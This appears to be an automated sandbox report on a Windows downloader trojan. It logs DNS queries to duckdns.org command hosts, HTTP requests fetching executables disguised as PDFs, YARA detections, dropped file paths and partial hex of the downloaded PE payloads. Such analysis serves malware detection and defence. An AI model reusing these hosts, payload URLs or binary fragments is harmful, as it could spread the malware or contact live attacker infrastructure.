c3 34 d3 e8 13 78 bd 45 f7 83 f1 7f 14 55 fc fe d1 96 40 b5 14 84 e6 ce ac 15 9e a7 61 e9 de 17 6b 96 1a 2a 24 fa 59 49 19 c0 e9 16 3d 9e 78 ed a0 16 37 b7 6e 0d d1 8f 3b 83 41 90 dd 3d b9 5e 1a fa a2 51 4d c2 70 52 83 5e 03 35 95 90 26 a6 68 97 0d c3 19 00 18 dc 20 f8 55 bb 93 6f 51 ee 88 24 bf 4f 3a 2c d1 02 bd 41 6d 8a 5e 31 b2 ad 37 11 5a f8 e5 00 74 8d d4 af ec 69 23 48 3e 1b 31 5e 3e b2 ed a2 11 95 ba 6f 58 9c d7 20 f1 58 02 9c 78 74 d7 fb 1a ec cc fe 97 61 fd ce 25 2d ea aa fd 4e aa 47 95 e9 bb 9c bb 0a 8f 88 46 da 79 d4 cc b7 de a6 54 90 1f fe 60 83 dd 53 3a ab 21 5a f2 14 e4 b7 ab 1c 00 73 5a 39 f7 cf 39 a2 81 52 99 54 78 b4 2e 75 6a 99 93 60 1b 6c 10 f3 49 65 49 ac b7 b8 8b fd 44 95 ed 7f 86 dc 13 34 76 96 02 a7 22 9a 07 22 8e b2 90 01 7c f1 2e b5 39 4c 09 ad cc f2 4d e2 93 21 67 0c dd 7d 30 0b 07 c1 50 94 00 4d 6c 54 f6 f7 3e 9d e
Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 05:20:33 GMT Server: Apache/2.4.57 (Debian) Last-Modified: Sat, 13 Apr 2024 09:20:23 GMT ETag: "2b2a08-615f6e5e5f7b6" Accept-Ranges: bytes Content-Length: 2828808 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: ac ec bc 8d 54 4e 3a 3f 8b 04 47 89 3f f3 60 fb cb ad a1 ea 3d a6 23 a4 35 9e ac 0d c9 df 69 f9 e0 67 7d 3b 0a 70 3b 92 94 72 80 13 57 05 03 23 7d b7 b0 bb 2e ea 36 7a c4 1e 68 9f ef 95 30 a4 73 0a 4b 94 27 7e 28 65 6e 57 61 53 1a 3c 07 8b 3a 76 bb cd a5 34 f9 4f 1f 6f 28 c3 fa b8 19 44 c4 98 6d 4c d9 c6 ac 53 b4 ea 87 27 bd 88 9b e9 5b 9e 54 9e e5 80 d9 f5 78 0e 79 99 42 01 cb 0a 5d 0d e7 81 42 10 37 ab c4 46 7c 8d 1d 5f 6b 32 65 bf 9a 80 8a f3 ab a1 a1 02 6b 33 35 de 27 6b a2 b5 85 9c 20 e3 39 e8 01 42 c9 90 1c d5 f8 2f 2b 10 32 3f 42 20 cb 7d ee 59 fb 11 c3 c0 57 ce f8 78 83 fb 3f 78 29 ee 78 49 9e 40 88 d1 b4 5f bd e1 af e8 9d 5d 57 b7 b5 3c 8c 80 1a 08 ab 78 09 73 3a b7 fd a0 b2 5c b5 12 76 a3 ae 6b 1e 70 94 3e 66 f7 9b 99 45 50 cc ac 80 65 ed e3 fb 48 6f 3f 62 9d 55 b1 d6 b5 60 49 ba 38 52 f9 27 93 26 ea 09 92 b8 74 1b 69 c0 18 57 a4 52 87 59 84 fe 50 4d 38 77 99 e6 c5 34 ac 1f bd 43 b9 ae 20 12 86 27 31 09 61 1e a4 34 1e be f3 1e 3c 8b af 24 0f 4b 4d 74 0b 5c 0a 17 43 80 17 61 0e af 64 0a 5d 75 dc 73 72 0c ad bc d4 f3 ed 6a 73 f8 fd 41 f2 10 d7 58 09 4f d6 b9 11 1e 7c 52 f4 f4 f3 97 6b 9e e7 e5 83 f2 03 0c 49 a8 22 f2 ad 4d 39 94 df d8 c3 4d 9a 4f 28 26 a9 6c f9 7a ca d1 70 24 5f d4 c3 41 4d 6c 47 cc da cf 2d 09 e9 43 f2 bc de 3f 5a 0f 9f 80 6f c5 29 46 13 09 02 31 32 0c a0 6c f6 07 16 7f 8b d3 27 55 b5 43 52 e1 e4 8e e5 e5 fe b4 2e 8b fb a3 65 e5 b1 62 1f 87 42 01 2c 1d 63 8c 1a 14 5a 8c 3a 90 83 b0 0a 4a 88 45 25 82 0b d8 67 78 44 a6 f2 8e 4d 39 cf 49 34 ac 0d 43 7c 82 6b f6 1e a7 1d 88 6a f8 20 c9 71 b9 21 da 41 6a cf 7a f8 9b a4 1f 21 c6 3c cf 1c 42 0e e1 d4 ab a3 6e de 3e 0b 0a 3b f6 e2 b3 fd 3d dc 1d a9 b2 bd e7 35 07 75 f1 2b df 84 5c 4a 35 ca 2e 65 95 b4 0e 33 34 84 6b 90 fe 0d cd 59 6a b6 e3 c0 6c b1 ed fd f2 b2 d3 93 37 70 5b 27 34 93 2b 43 e4 6c ec f0 1e 45 a6 65 20 65 08 27 37 86 8e 80 9d cc 5b e2 70 c3 34 d3 e8 13 78 bd 45 f7 83 f1 7f 14 55 fc fe d1 96 40 b5 14 84 e6 ce ac 15 9e a7 61 e9 de 17 6b 96 1a 2a 24 fa 59 49 19 c0 e9 16 3d 9e 78 ed a0 16 37 b7 6e 0d d1 8f 3b 83 41 90 dd 3d b9 5e 1a fa a2 51 4d c2 70 52 83 5e 03 35 95 90 26 a6 68 97 0d c3 19 00 18 dc 20 f8 55 bb 93 6f 51 ee 88 24 bf 4f 3a 2c d1 02 bd 41 6d 8a 5e 31 b2 ad 37 11 5a f8 e5 00 74 8d d4 af ec 69 23 48 3e 1b 31 5e 3e b2 ed a2 11 95 ba 6f 58 9c d7 20 f1 58 02 9c 78 74 d7 fb 1a ec cc fe 97 61 fd ce 25 2d ea aa fd 4e aa 47 95 e9 bb 9c bb 0a 8f 88 46 da 79 d4 cc b7 de a6 54 90 1f fe 60 83 dd 53 3a ab 21 5a f2 14 e4 b7 ab 1c 00 73 5a 39 f7 cf 39 a2 81 52 99 54 78 b4 2e 75 6a 99 93 60 1b 6c 10 f3 49 65 49 ac b7 b8 8b fd 44 95 ed 7f 86 dc 13 34 76 96 02 a7 22 9a 07 22 8e b2 90 01 7c f1 2e b5 39 4c 09 ad cc f2 4d e2 93 21 67 0c dd 7d 30 0b 07 c1 50 94 00 4d 6c 54 f6 f7 3e 9d e
Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 05:20:53 GMT Server: Apache/2.4.57 (Debian) Last-Modified: Sat, 13 Apr 2024 09:20:23 GMT ETag: "2b2a08-615f6e5e5f7b6" Accept-Ranges: bytes Content-Length: 2828808 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: ac ec bc 8d 54 4e 3a 3f 8b 04 47 89 3f f3 60 fb cb ad a1 ea 3d a6 23 a4 35 9e ac 0d c9 df 69 f9 e0 67 7d 3b 0a 70 3b 92 94 72 80 13 57 05 03 23 7d b7 b0 bb 2e ea 36 7a c4 1e 68 9f ef 95 30 a4 73 0a 4b 94 27 7e 28 65 6e 57 61 53 1a 3c 07 8b 3a 76 bb cd a5 34 f9 4f 1f 6f 28 c3 fa b8 19 44 c4 98 6d 4c d9 c6 ac 53 b4 ea 87 27 bd 88 9b e9 5b 9e 54 9e e5 80 d9 f5 78 0e 79 99 42 01 cb 0a 5d 0d e7 81 42 10 37 ab c4 46 7c 8d 1d 5f 6b 32 65 bf 9a 80 8a f3 ab a1 a1 02 6b 33 35 de 27 6b a2 b5 85 9c 20 e3 39 e8 01 42 c9 90 1c d5 f8 2f 2b 10 32 3f 42 20 cb 7d ee 59 fb 11 c3 c0 57 ce f8 78 83 fb 3f 78 29 ee 78 49 9e 40 88 d1 b4 5f bd e1 af e8 9d 5d 57 b7 b5 3c 8c 80 1a 08 ab 78 09 73 3a b7 fd a0 b2 5c b5 12 76 a3 ae 6b 1e 70 94 3e 66 f7 9b 99 45 50 cc ac 80 65 ed e3 fb 48 6f 3f 62 9d 55 b1 d6 b5 60 49 ba 38 52 f9 27 93 26 ea 09 92 b8 74 1b 69 c0 18 57 a4 52 87 59 84 fe 50 4d 38 77 99 e6 c5 34 ac 1f bd 43 b9 ae 20 12 86 27 31 09 61 1e a4 34 1e be f3 1e 3c 8b af 24 0f 4b 4d 74 0b 5c 0a 17 43 80 17 61 0e af 64 0a 5d 75 dc 73 72 0c ad bc d4 f3 ed 6a 73 f8 fd 41 f2 10 d7 58 09 4f d6 b9 11 1e 7c 52 f4 f4 f3 97 6b 9e e7 e5 83 f2 03 0c 49 a8 22 f2 ad 4d 39 94 df d8 c3 4d 9a 4f 28 26 a9 6c f9 7a ca d1 70 24 5f d4 c3 41 4d 6c 47 cc da cf 2d 09 e9 43 f2 bc de 3f 5a 0f 9f 80 6f c5 29 46 13 09 02 31 32 0c a0 6c f6 07 16 7f 8b d3 27 55 b5 43 52 e1 e4 8e e5 e5 fe b4 2e 8b fb a3 65 e5 b1 62 1f 87 42 01 2c 1d 63 8c 1a 14 5a 8c 3a 90 83 b0 0a 4a 88 45 25 82 0b d8 67 78 44 a6 f2 8e 4d 39 cf 49 34 ac 0d 43 7c 82 6b f6 1e a7 1d 88 6a f8 20 c9 71 b9 21 da 41 6a cf 7a f8 9b a4 1f 21 c6 3c cf 1c 42 0e e1 d4 ab a3 6e de 3e 0b 0a 3b f6 e2 b3 fd 3d dc 1d a9 b2 bd e7 35 07 75 f1 2b df 84 5c 4a 35 ca 2e 65 95 b4 0e 33 34 84 6b 90 fe 0d cd 59 6a b6 e3 c0 6c b1 ed fd f2 b2 d3 93 37 70 5b 27 34 93 2b 43 e4 6c ec f0 1e 45 a6 65 20 65 08 27 37 86 8e 80 9d cc 5b e2 70 c3 34 d3 e8 13 78 bd 45 f7 83 f1 7f 14 55 fc fe d1 96 40 b5 14 84 e6 ce ac 15 9e a7 61 e9 de 17 6b 96 1a 2a 24 fa 59 49 19 c0 e9 16 3d 9e 78 ed a0 16 37 b7 6e 0d d1 8f 3b 83 41 90 dd 3d b9 5e 1a fa a2 51 4d c2 70 52 83 5e 03 35 95 90 26 a6 68 97 0d c3 19 00 18 dc 20 f8 55 bb 93 6f 51 ee 88 24 bf 4f 3a 2c d1 02 bd 41 6d 8a 5e 31 b2 ad 37 11 5a f8 e5 00 74 8d d4 af ec 69 23 48 3e 1b 31 5e 3e b2 ed a2 11 95 ba 6f 58 9c d7 20 f1 58 02 9c 78 74 d7 fb 1a ec cc fe 97 61 fd ce 25 2d ea aa fd 4e aa 47 95 e9 bb 9c bb 0a 8f 88 46 da 79 d4 cc b7 de a6 54 90 1f fe 60 83 dd 53 3a ab 21 5a f2 14 e4 b7 ab 1c 00 73 5a 39 f7 cf 39 a2 81 52 99 54 78 b4 2e 75 6a 99 93 60 1b 6c 10 f3 49 65 49 ac b7 b8 8b fd 44 95 ed 7f 86 dc 13 34 76 96 02 a7 22 9a 07 22 8e b2 90 01 7c f1 2e b5 39 4c 09 ad cc f2 4d e2 93 21 67 0c dd 7d 30 0b 07 c1 50 94 00 4d 6c 54 f6 f7 3e 9d e
Source: http Bad PDF prefix: HTTP/1.1 200 OK Date: Fri, 19 Apr 2024 05:21:12 GMT Server: Apache/2.4.57 (Debian) Last-Modified: Thu, 18 Apr 2024 15:19:20 GMT ETag: "2bfa08-616607ec944e4" Accept-Ranges: bytes Content-Length: 2882056 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf Data Raw: cf 22 53 82 fb 03 cc a5 c7 8e 8b 86 6a f1 7a 1b e8 96 32 3a 86 24 82 72 1c bb 5b 2f bb 2f f6 20 7d 92 da c7 cf d9 76 8e f1 f1 66 88 51 0a f8 28 73 d8 9c 80 66 7a e5 ab 45 17 61 79 9f 40 30 dd 25 58 39 28 56 79 af 8f eb ce 23 15 3e 29 e9 04 c5 c0 7e df ea f6 21 cd 78 a5 92 3d cc 1d d0 02 06 26 a9 a9 1b e9 f4 de 38 94 9d f2 8b b8 ae c6 81 5a 73 e8 56 2c 19 d6 20 c4 92 48 36 6a 8d cc 6f 69 de 3f a4 e1 82 6a f2 93 3c 47 18 1c c8 25 61 bb 46 17 07 4c b0 73 cf 30 20 c7 25 53 a1 e1 6f fe ff b9 ed 50 88 32 45 d2 6b 84 80 2a a0 b9 41 cd 11 9f f0 d4 be 29 d7 3c ee 3a b1 c8 f2 1a b9 07 de fa 94 92 da 3b 66 cf 68 00 85 8b 83 e3 1d bb 6b 59 1d b0 43 ff 8a c2 35 63 93 66 96 0a b9 d2 74 05 fe 11 c8 56 8b 99 56 3d 60 30 98 b7 11 61 4e cc ba ed 49 d8 eb 09 98 5d 4a 94 c0 2b 33 31 7c 95 7b ac 41 ba 94 42 23 78 83 f3 07 92 a1 26 88 ac 9d a4 be 02 8c 70 70 61 af e1 5c 52 c4 8e bf 33 96 b5 aa f5 31 04 85 83 d9 cf f9 a6 e6 3d 30 a5 40 55 3e 0f 26 52 53 7a a0 84 ed 4c c6 17 51 41 74 e8 a4 59 d9 ba d9 d4 44 46 5a 05 8c b0 98 a2 8c 63 e9 11 bb 48 4d c1 50 c4 08 78 78 8f 7b 53 0d e6 85 c9 9e ab f9 2e c1 b6 08 00 81 db 6c 1f a1 c8 2e ee ac 17 fd 30 93 b9 d0 ed 43 b5 54 9c cc 0b db 3b 13 d1 f6 8b 68 17 83 d3 7f b9 fc a4 f2 18 98 94 0a 99 99 46 8b d2 00 16 50 8c 0c 6b a9 f3 c4 c9 ca 14 a4 23 77 cc 96 89 ee dc 05 0a c6 71 86 c1 99 c7 9c ff 52 8b 8e 23 64 c6 38 bd 63 7e e5 e2 15 bf b9 9a ba ad c1 9f 50 5d 04 a4 2b 0c 36 51 8c ce 4c 28 4e 3b f8 d2 37 5d bf 70 cf dc 4d cb cb 05 b1 92 48 70 be 10 8b 89 5f 80 7c 50 ef 8f ba 70 aa 05 12 47 60 95 fc ad 05 00 3f 65 2b 6b 6a 70 2b 06 a5 8a 04 61 51 87 7d 0b 98 2b 99 0e f9 d3 74 25 0e 22 e9 a7 24 59 c0 45 a5 99 42 63 6f 07 9f 8b e9 35 3d 9a 4f ce a1 e9 f7 45 d9 87 25 fc e2 8b 17 29 40 0b 7f 5e e9 68 17 6d 48 25 84 9e 68 5f 11 63 5c 7e 7d 31 ea a0 be 71 7a 8a 8a c5 d7 f6 52 7c 32 2b a9 1a 23 b8 cd fe 75 3b 58 59 7c 02 e3 54 87 35 5c 09 94 64 02 19 0e 21 db f3 c5 e4 5b f1 34 99 2b b3 e5 76 a7 8f c5 a3 87 38 70 df d6 1f 52 7d fe c0 8f 29 5a 81 d0 fc ea 50 34 fb 8d 8b 92 67 ae 0d 24 b8 ee c4 35 55 48 f4 2e 18 55 9e b0 d3 0e e9 c0 a8 93 fa 7e af c4 22 df 17 ad c3 4c c6 69 6d 3b d4 7e 45 38 95 31 fb 6d 79 51 72 b6 9e d4 9e 46 66 dd 6f 63 b1 cf 25 a7 be 73 8b 48 a1 2e 30 d3 4b 7e f0 d7 26 9e 97 34 27 ac d5 06 10 dc b1 be 0b ff 58 15 9e 21 a2 82 4b e6 d1 08 db 65 6a 2e d3 06 bd e0 c2 b5 88 ef 23 e6 7b b2 e8 e2 30 2e bc 29 ff 2b 16 4b 49 c9 5c eb b4 18 1b 7a ee 87 ae fd c1 7b ba 41 f3 33 8e c4 5b 2e b3 7a e9 1e 03 55 72 23 8c 7c 6f 5c cc bd ed 18 85 77 85 70 7d 47 a4 7c 50 ae 4d db ef 1e 06 a4 dc d3 c7 54 49 e3 05 f7 62 a7 d3 9c 61 f5 0e 1b 81 e0 ea 23 a9 09 87 ae c2 b1 b9 75 ed a9 15 cf da 8f 1b ff e4 90 4f 0a b5 60 9c f8 5b e8 ac df 6b 38 e2 c2 53 ea 5
Uses dynamic DNS services
Source: unknown DNS query: name: bnfjdbhgo.duckdns.org
Source: unknown DNS query: name: juytlioojbni.duckdns.org
Source: unknown DNS query: name: miliutyhgdue.duckdns.org
Yara detected Generic Downloader
Source: Yara match File source: SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe, type: SAMPLE
Source: Yara match File source: 0.0.SecuriteInfo.com.Trojan.DownLoader46.57007.12424.22631.exe.9d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.Keywords.exe.48b3ed0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Roaming\NamedPermissionSets\AlgorithmType.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\fdyryi.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Local\jautwk\Keywords.exe, type: DROPPED
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.10:49709 -> 91.92.253.47:58001
Source: global traffic TCP traffic: 192.168.2.10:49775 -> 91.92.246.62:39005
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 19 Apr 2024 05:20:40 GMTServer: Apache/2.4.57 (Debian)Last-Modified: Tue, 09 Apr 2024 17:32:59 GMTETag: "2d128-615ad50316917"Accept-Ranges: bytesContent-Length: 184616Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 03 00 0c 79 15 66 00 00 00 00 00 00 00 00 f0 00 2e 00 0b 02 06 00 00 52 02 00 00 32 00 00 00 00 00 00 f2 70 02 00 00 20 00 00 00 00 40 00 00 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 02 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 70 02 00 57 00 00 00 00 80 02 00 f8 2e 00 00 00 00 00 00 00 00 00 00 00 86 02 00 28 4b 00 00 00 c0 02 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fe 50 02 00 00 20 00 00 00 52 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 2e 00 00 00 80 02 00 00 30 00 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 02 00 00 02 00 00 00 84 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 d4 70 02 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 4d 01 00 f8 22 01 00 01 00 00 00 39 04 00 06 60 30 01 00 40 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 75 01 00 00 01 00 00 11 20 92 bb 60 41 0c 20 32 32 dd cd 08 59 0d 73 25 00 00 0a 80 07 00 00 04 18 0b 07 16 73 26 00 00 0a 13 05 07 18 59 0b 11 05 07 6f 27 00 00 0a 13 04 07 13 06 11 04 2d 15 73 28 00 00 0a 13 05 17 13 06 11 05 11 06 6f 27 00 00 0a 13 04 20 95 42 1b c8 08 58 09 59 66 65 66 65 66 66 65 66 65 65 66 20 2b 6f 59 20 08 61 09 61 66 65 66 65 66 66 65 65 66 61 0a 11 04 2d 03 14 2b 07 11 04 6f 29 00 00 0a 13 08 11 04 2c 17 06 20 f2 44 2a a2 08 59 09 58 66 65 66 66 65 66 65 66 65 65 66 61 0a 11 08 2d 03 14 2b 07 11 08 6f 2a 00 00 0a 13 07 11 07 d0 ae 00 00 01 28 2b 00 00 0a 28 2c 00 00 0a 2c 1f 7e 03 00 00 04 1a 60 80 03 00 00 04 06 08 20 55 c2 1c cd 61 09 59 07 58 61 0a 38 86 00 00 00 11 07 14 28 2c 00 00 0a 2c 56 11 05 11 06 28 07 00 00 06 2c 28 06 20 4c 90 e4 b4 08 59 09 61 66 66 65 65 66 65 66 65 66 66 65 07 59 61 0a 7e 03 00 00 04 1f 10 60 80 03 00 00 04 2b 49 17 7e 03 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 19 Apr 2024 05:21:10 GMTServer: Apache/2.4.57 (Debian)Last-Modified: Thu, 18 Apr 2024 15:22:31 GMTETag: "16b28-616608a35afea"Accept-Ranges: bytesContent-Length: 92968Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c7 64 21 66 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 08 00 00 ec 00 00 00 32 00 00 00 00 00 00 3a 0b 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f0 0a 01 00 4a 00 00 00 00 20 01 00 e2 2e 00 00 00 00 00 00 00 00 00 00 00 20 01 00 28 4b 00 00 00 60 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 eb 00 00 00 20 00 00 00 ec 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e2 2e 00 00 00 20 01 00 00 30 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 01 00 00 02 00 00 00 1e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0b 01 00 00 00 00 00 48 00 00 00 02 00 05 00 d0 b7 00 00 58 4e 00 00 03 00 00 00 32 00 00 06 28 06 01 00 c8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 28 66 00 00 06 28 4a 00 00 06 2a 66 21 80 c4 9e a0 b8 2c d9 08 17 2b 06 80 01 00 00 04 2a 73 19 00 00 0a 2b f3 00 00 13 30 03 00 ea 01 00 00 01 00 00 11 20 a5 6e 98 c5 38 a1 01 00 00 20 b6 1b c2 0d 38 9d 01 00 00 59 38 9d 01 00 00 38 9e 01 00 00 80 08 00 00 04 18 38 9d 01 00 00 38 9e 01 00 00 16 38 9e 01 00 00 38 a3 01 00 00 38 a5 01 00 00 18 59 0b 11 05 07 6f 1a 00 00 0a 13 04 07 13 06 11 04 2d 15 73 1b 00 00 0a 13 05 17 13 06 11 05 11 06 6f 1a 00 00 0a 13 04 20 13 6d 61 07 08 61 09 58 66 65 66 65 66 66 65 65 66 20 86 e0 d6 6f 08 58 09 59 66 65 66 66 65 65 66 65 66 66 65 61 0a 19 2c 5a 11 04 2d 03 14 2b 07 11 04 6f 1c 00 00 0a 13 08 11 04 2c 17 06 20 b4 c3 f7 60 08 61 09 61 66 66 65 65 66 66 65 66 65 65 66 61 0a 11 08 2d 03 14 2b 07 11 08 6f 1d 00 00 0a 13 07 11 07 d0 34 00 00 01 28 1e 00 00 0a 28 1f 00 00 0a 2c 1f 1a 7e 04 00 00 04 60 80 04 00 00 04 06 20 dd 1e c2 0d 08 59 09 59 07 58 61 0a
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/Gkwyrkfwp.pdf HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/Gkwyrkfwp.pdf HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/Gkwyrkfwp.pdf HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/mirtn.exe HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/Wsrszrqqkm.vdf HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/Gkwyrkfwp.pdf HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/Wsrszrqqkm.vdf HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/Wsrszrqqkm.vdf HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/utr32.exe HTTP/1.1Host: bnfjdbhgo.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/plugin3.dll HTTP/1.1Host: juytlioojbni.duckdns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /byfronbypass.html/css/mss/Uuanez.pdf HTTP/1.1Host: bnfjdbhgo.duckdns.orgConnection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: THEZONEBG THEZONEBG
Source: Joe Sandbox View ASN Name: THEZONEBG THEZONEBG
Source: Joe Sandbox View ASN Name: THEZONEBG THEZONEBG
Source: Joe Sandbox View ASN Name: THEZONEBG THEZONEBG
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknown TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.42.65.85
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 173.222.162.55
Source: unknown TCP traffic detected without corresponding DNS query: 91.92.246.62
Source: unknown TCP traffic detected without corresponding DNS query: 91.92.246.62
Source: unknown TCP traffic detected without corresponding DNS query: 91.92.246.62
Source: unknown TCP traffic detected without corresponding DNS query: 91.92.246.62
Source: unknown TCP traffic detected without corresponding DNS query: 91.92.246.62
Source: unknown TCP traffic detected without corresponding DNS query: 91.92.246.62
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
